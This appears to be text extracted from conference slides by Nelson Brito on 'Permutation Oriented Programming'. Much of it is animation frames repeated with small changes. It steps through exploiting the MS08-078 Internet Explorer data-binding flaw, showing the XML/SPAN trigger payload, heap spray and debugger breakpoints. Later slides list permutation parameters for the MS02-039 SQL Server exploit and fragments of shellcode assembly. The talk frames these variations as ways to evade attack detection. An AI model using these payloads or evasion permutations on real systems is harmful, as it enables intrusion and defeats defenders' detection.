                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                          vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               CRecordInstance::AddBinding
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                                   CImplPtrAry::Append
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               XML Data Source Object #01
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                          CRecordInstance::TransferToDestination
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                     0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                  CXfer::TransferFromSrc
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                     0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                           CRecordInstance::RemoveBinding
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                       _MemFree
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                       HeapFree
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                      RtlFreeHeap
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                 RtlpLowFragHeapFree
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                   CImplAry::Delete
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                               CRecordInstance::Detach
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                     0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                                  CXfer::TransferFromSrc
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                  Internet Explorer                      Microsoft® HTML Viewer – MSHTML.DLL
                  (Data Consumers)                                   (Binding Agent)

                 Data Consumer #01
                                                     0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                        DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       DATASRC                        DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                         vulnerability

                    Internet Explorer                    Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                 (Binding Agent)

                 Data Consumer #01
                                                     0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                               XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                                             (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                                  (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                                  (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                                  (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                   ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                   ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
        eax                   ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                              ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                              ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                              ecx            (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                                             (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                                  vulnerability

                    Internet Explorer                                Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                             (Binding Agent)

                 Data Consumer #01

       DATASRC                          DATAFLD
                                                  Trigger0 a 0 a 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
                                                       0a


                 Data Consumer #02
                                                                              XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                                             (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                           vulnerability

                    Internet Explorer                              Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                           (Binding Agent)

                 Data Consumer #01

       DATASRC
                                            Permutation 0 a . 0 0 n 0 0 b 0 0 r 0 0 i 0 0 t 0 0 o 0 0 . 0 0 n 0 0 e 0 0 t
                                        DATAFLD
                                                   0a0a0a


                 Data Consumer #02
                                                                          XML Data Source Object #02
       0x0a0a0a0a                       DATAFLD




                                                    shellcode
                                             (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
memory manipulation                                                                                 vulnerability

                    Internet Explorer                           Microsoft® HTML Viewer – MSHTML.DLL
                    (Data Consumers)                                        (Binding Agent)

                 Data Consumer #01
                                                           0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
       DATASRC                          DATAFLD

                 Data Consumer #02
                                                                       XML Data Source Object #02
                                        DATAFLD
       0x0a0a0a0a
                                            Exploitation

                                                    shellcode
                                             (sprayed into the heap)




        <XML ID=I><X><C><![CDATA[<IMG SRC=http://&#x0a0a;&#x0a0a;.nbrito.net>]]></C></X></XML>
                      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
              <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
                    <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
MS08-078 Breakingpoints

 bp   mshtml!CElement::GetAAdataFld
 bp   mshtml!CElement::GetAAdataSrc
 bp   mshtml!CCurrentRecordConsumer::Bind
 bp   mshtml!CCurrentRecordInstance::GetCurrentRecordInstance
 bp   mshtml!CXfer::CreateBinding
 bp   mshtml!CXfer::TransferFromSrc
 bp   mshtml!CXfer::Detach
 bp   mshtml!CRecordInstance::CRecordInstance
 bp   mshtml!CRecordInstance::AddBinding
 bp   mshtml!CRecordInstance::TransfertoDestination
 bp   mshtml!CRecordInstance::RemoveBinding
 bp   mshtml!CRecordInstance::Detach
 bp   mshtml!CRecordInstance::~CRecordInstance
 bp   mshtml!CImplPtrAry::Append
 bp   mshtml!CImplPtrAry::Delete
 bp   _MemFree
 bp   kernel32!HeapFree
 bp   ntdll!RtlFreeHeap
 bp   ntdll!RtlpLowFragHeapFree
MS08-078 Breakingpoints

 bp   mshtml!CElement::GetAAdataFld
 bp   mshtml!CElement::GetAAdataSrc
 bp   mshtml!CCurrentRecordConsumer::Bind
 bp   mshtml!CCurrentRecordInstance::GetCurrentRecordInstance
 bp   mshtml!CXfer::CreateBinding
 bp   mshtml!CXfer::TransferFromSrc
 bp   mshtml!CXfer::Detach
 bp   mshtml!CRecordInstance::CRecordInstance
 bp   mshtml!CRecordInstance::AddBinding
 bp   mshtml!CRecordInstance::TransfertoDestination
 bp   mshtml!CRecordInstance::RemoveBinding
 bp   mshtml!CRecordInstance::Detach
 bp   mshtml!CRecordInstance::~CRecordInstance
 bp   mshtml!CImplPtrAry::Append
 bp   mshtml!CImplPtrAry::Delete
 bp   _MemFree
 bp   kernel32!HeapFree
 bp   ntdll!RtlFreeHeap
 bp   ntdll!RtlpLowFragHeapFree
"ENG++: Permutation Oriented Programming" por Nelson Brito
Approach
                                                                   Unconditional
Vulnerability

                                                                   Complete (YES)


                                                                   Incomplete (NO)


 Vulnerable
                Documentation?    Document         Alternatives?
 Ecosystem




                                   Reverse
                  Reversing?                       Alternatives?      Alternatives
                                   Engineer




                                 Obfuscation


                 Exploitation                                        Arbitrary code
Alternatives
                  Detection                                         Attack detection


                                 Alternatives?   Permutation OP
MS02-039 POPed
• SQL Request:                                              • JUMP:
    – CLNT_UCAST_INST (0x04).                                   – Unconditional JUMP short, relative,       and
                                                                  forward to REL8.
• SQL INSTANCENAME:                                             – There are 115 possible values to REL8.
    – ASCII hexa values from 0x01 to 0xff, except:              – 115 permutations.
       0x0a, 0x0d, , 0x2f, 0x3a and 0x5c.
    – 24,000 permutations.                                  • Writable address and memory alignment:
                                                                – There are 26,758 new writable addresses within
• Return address:                                                  SQLSORT.DLL (Microsoft SQL Server 2000
    – Uses the “jump to register” technique, in this               SP0/SP1/SP2). There are much more writable
       case the ESP register.                                      addresses if do not mind making it hardcoded.
    – There are four (4) new possible return addresses          – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and
       within SQLSORT.DLL (Microsoft SQL Server                    “OlyDBG 2.01 alpha 2” by Oleh Yuschuk.
       2000 SP0/SP1/SP2). There are much more return            – 26,758 permutations.
       addresses if do not mind making it hardcoded.
    – Tools: “Findjmp.c” by Ryan Permeh, (“Hacking          • Padding and memory alignment:
       Proof your Network – Second Edition”, 2002),             – ASCII hexa values from 0x01 to 0xff.
       and “DumpOp.c” by Koskya Kortchinsky (“Macro             – The length may vary, depending on JUMP, from
       reliability in Win32 Exploits” – Black Hat Europe,          3,048 to 29,210 possibilities.
       2007).
                                                                – 29,210 permutations.
    – 4 permutations.
MS08-078 POPed
MS08-078 POPed
MS08-078 POPed
• CVE-2008-4844: “…crafted XML document              • Data Consumer (HTML elements):
  containing nested <SPAN> elements”? I do not          – According to MSDN (“Binding HTML
  think so…                                                Elements to Data”) there are, at least,
                                                           fifteen (15) bindable HTML elements
• XML Data Island:                                         available, but only five (5) elements are
   – There are two (2) options: using the                  useful.
     Dynamic HTML (DHTML) <XML> element                 – The HTML element is a key trigger, because
     within the HTML document or overloading               it points to a dereferenced XML DSO, but
     the HTML <SCRIPT> element.                            it does not have to be the same HTML
   – Unfortunately, the HTML <SCRIPT>                      element to do so – it can be any mixed
     element is useless.                                   HTML element.
   – But there are three (03) new alternatives to       – 25 permutations.
     embedded a DSO.
   – 4 permutations.                                 • Return address:
                                                         – Uses “Heap Spray” technique, in this case
• XML Data Source Object (DSO):                            the XML DSO handles the return address,
                                                           and can use “.NET DLL” technique by Mark
   – Characters like “<” and “&” are illegal in            Dowd and Alexander Sotirov (“How to
     <XML> element. To avoid errors <XML>                  Impress Girls with Browser Memory
     element can be defined as CDATA                       Protection Bypasses” – Black Hat USA,
     (Unparsed Character Data). But the <XML>              2008).
     element can be also defined as “&lt;” instead
     of “<”.                                             – There are, at least, four (4) new possible
                                                           return addresses.
   – Both <IMG SRC= > and <IMAGE SRC= >
     elements are useful as a XML DSO.                   – 4 permutations.
   – 4 permutations.
"ENG++: Permutation Oriented Programming" por Nelson Brito
Shellcode


Regular                                              Hadoken (波動拳)
shell:                                               shell:
   push   0x00646D63                                    call shell_set_cmd
   mov    ebx, esp                                      db   “CMD /k”, 0
   push   edi                                        shell_set_cmd:
   push   edi                                           pop ebx
   push   edi                                           push edi
   xor    esi, esi                                      push edi
   push   byte 18                                       push edi
   pop    ecx                                           xor esi, esi
                                                        push byte 18
 Code by Stephen Fewer (Harmony Security) and part      pop ecx
 of Metasploit Framework.

                                                      Ideas by sk (SCAN Associates Berhad), and published
                                                      on Phrack Magazine (issue 62, file 7).

                                                      Demonstrated on H2HC 6th Edition (2009).
Shellcode


Regular                                              Hadoken (波動拳)
shell:                                               shell:
   push   0x00646D63                                    call shell_set_cmd
   mov    ebx, esp                                      db   “CMD /k”, 0
   push   edi                                        shell_set_cmd:
   push   edi                                           pop ebx
   push   edi                                           push edi
